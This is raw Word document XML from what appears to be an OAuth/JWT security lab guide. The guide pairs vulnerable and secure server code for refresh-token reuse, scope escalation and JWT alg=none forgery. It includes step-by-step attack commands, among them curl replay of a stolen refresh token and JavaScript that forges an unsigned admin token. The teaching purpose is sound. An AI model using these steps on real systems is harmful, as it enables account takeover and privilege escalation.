        <w:t xml:space="preserve">Use the stolen refresh token to get a new access token:</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-X POST YOUR_DOMAIN:3001/oauth/token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"grant_type=refresh_token"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"refresh_token=STOLEN_TOKEN"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"client_id=legitimate-client"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-d "client_secret=legitimate-secret-abc123"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the same command 5 more times — the SAME refresh token works every time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Check YOUR_DOMAIN:3001/admin/refresh-tokens — see rotated: 0, revoked: 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Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="63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Property</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Vulnerable vs Secure</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Expiry</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VULNERABLE: 10 years  |  SECURE: 30 days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Rotation</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VULNERABLE: none  |  SECURE: new token issued on every use</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Reuse detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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VULNERABLE: none  |  SECURE: reuse revokes entire token family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C92A2A" w:sz="8"/>
              <w:bottom w:val="none"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C92A2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">🔴 VULNERABLE — token persists forever</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const expiryDays = VULNERABLE ? 3650 : 30;</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Old token never revoked — returned unchanged every time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:tcBorders>
              <w:top w:val="none"/>
              <w:left w:val="single" w:color="C92A2A" w:sz="8"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF2F2"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EA043" w:sz="8"/>
              <w:bottom w:val="none"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F0FFF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2EA043"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">🟢 SECURE — revoke old, issue new on every use</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db.prepare('UPDATE refresh_tokens SET revoked=1 WHERE token=?').run(oldToken);</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const newToken = generateRefreshToken();</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Attacker's copy is dead after first legitimate use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:tcBorders>
              <w:top w:val="none"/>
              <w:left w:val="single" w:color="2EA043" w:sz="8"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F0FFF4"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12"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFBEB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="140"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="140"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">ATK 6  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1117"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Scope Escalation</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity: HIGH  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="6B7280"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  |  Vulnerable file: auth-server/src/routes/auth.js  |  VULNERABLE: server grants all requested scopes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Background</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The auth server should only grant scopes that the client has pre-registered. A vulnerable server grants whatever scopes are requested, allowing privilege escalation just by asking for more.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Step-by-Step Attack Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Open this URL (scope includes admin and write, which legitimate-client did not register):</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YOUR_DOMAIN:3001/oauth/authorize?response_type=code</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&amp;client_id=legitimate-client</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&amp;redirect_uri=YOUR_DOMAIN%3A3002%2Fcallback</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&amp;scope=read+profile+email+admin+write&amp;state=attack6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Log in as alice / password123, click Allow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete the callback flow. Decode the access token at jwt.io — the scope claim includes admin write.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Call the admin endpoint with the escalated token:</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YOUR_DOMAIN:3003/api/admin/users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-H "Authorization: Bearer ACCESS_TOKEN"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C92A2A" w:sz="8"/>
              <w:bottom w:val="none"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C92A2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">🔴 VULNERABLE — all requested scopes returned</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return requested; // no intersection check</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legitimate-client asked for: [read, profile, email, admin, write]</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granted: [read, profile, email, admin, write] ← admin included!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:tcBorders>
              <w:top w:val="none"/>
              <w:left w:val="single" w:color="C92A2A" w:sz="8"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF2F2"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EA043" w:sz="8"/>
              <w:bottom w:val="none"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F0FFF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2EA043"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">🟢 SECURE — intersection of requested ∩ registered</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return requested.filter(s =&gt; registered.includes(s));</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legitimate-client registered: [read, profile, email]</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granted: [read, profile, email]  ← admin stripped</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:tcBorders>
              <w:top w:val="none"/>
              <w:left w:val="single" w:color="2EA043" w:sz="8"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F0FFF4"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2A2A" w:sz="12"/>
              <w:left w:val="single" w:color="C92A2A" w:sz="12"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="140"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="140"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C92A2A"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">ATK 7  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1117"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">JWT Algorithm Confusion (alg=none)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C92A2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity: CRITICAL  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="6B7280"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  |  Vulnerable file: resource-server/src/server.js  |  CVE-2015-9235 — unsigned tokens accepted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Background</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The resource server calls jwt.decode() instead of jwt.verify(). decode() only Base64-decodes the payload — it does NOT check the signature. Combined with a token crafted with alg="none" and an empty signature, an attacker can forge any payload they want.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Step-by-Step Attack Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Open the forge tool: YOUR_DOMAIN:3004/forge-jwt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy the forged_alg_none_token from the page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test against the profile endpoint:</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YOUR_DOMAIN:3003/api/profile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-H "Authorization: Bearer FORGED_TOKEN"</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VULNERABLE: 200 OK with alice's profile — no valid signature!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test against the admin endpoint:</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curl YOUR_DOMAIN:3003/api/admin/users \</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-H "Authorization: Bearer FORGED_TOKEN"</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VULNERABLE: full user list returned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Build your own forged token (in browser console or Node.js):</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const h = btoa(JSON.stringify({alg:"none",typ:"JWT"}))</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.replace(/=/g,"").replace(/\+/g,"-").replace(/\//g,"_");</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const p = btoa(JSON.stringify({</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sub:"admin", username:"admin", scope:"read write admin",</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roles:["user","admin"],</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iss:"YOUR_DOMAIN:3001", aud:"YOUR_DOMAIN:3003",</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  exp:Math.floor(Date.now()/1000)+3600, iat:Math.floor(Date.now()/1000)</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})).replace(/=/g,"").replace(/\+/g,"-").replace(/\//g,"_");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="1F6FEB" w:sz="6"/>
        </w:pBdr>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="0550AE"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">console.log(h + "." + p +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C92A2A" w:sz="8"/>
              <w:bottom w:val="none"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C92A2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">🔴 VULNERABLE — resource-server/src/server.js</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decoded = jwt.decode(token);  // base64 only — zero signature verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:tcBorders>
              <w:top w:val="none"/>
              <w:left w:val="single" w:color="C92A2A" w:sz="8"/>
              <w:bottom w:val="none"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="30"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="30"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="991B1B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// alg=none, tampered payloads, forged tokens — all accepted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:tcBorders>
              <w:top w:val="none"/>
              <w:left w:val="single" w:color="C92A2A" w:sz="8"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF2F2"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EA043" w:sz="8"/>
              <w:bottom w:val="none"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F0FFF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2EA043"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">🟢 SECURE — algorithm whitelist enforced</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decoded = jwt.verify(token, JWT_SECRET, {</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algorithms: ['HS256'],  // alg=none → rejected immediately</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issuer: 'YOUR_DOMAIN:3001',</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  audience: 'YOUR_DOMAIN:3003',</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:tcBorders>
              <w:top w:val="none"/>
              <w:left w:val="single" w:color="2EA043" w:sz="8"/>
              <w:bottom w:val="none"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F0FFF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="30"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="30"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="166534"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">});</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:tcBorders>
              <w:top w:val="none"/>
              <w:left w:val="single" w:color="2EA043" w:sz="8"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F0FFF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tc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8"/>
              <w:left w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EFF6FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F6FEB"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">🔑 Key Rule</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="374151"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">NEVER use jwt.decode() for authentication decisions. Only jwt.verify() with an explicit algorithm whitelist prevents alg=none, RS256-substitution, and other algorithm confusion attacks.</w:t>
            </w:r>
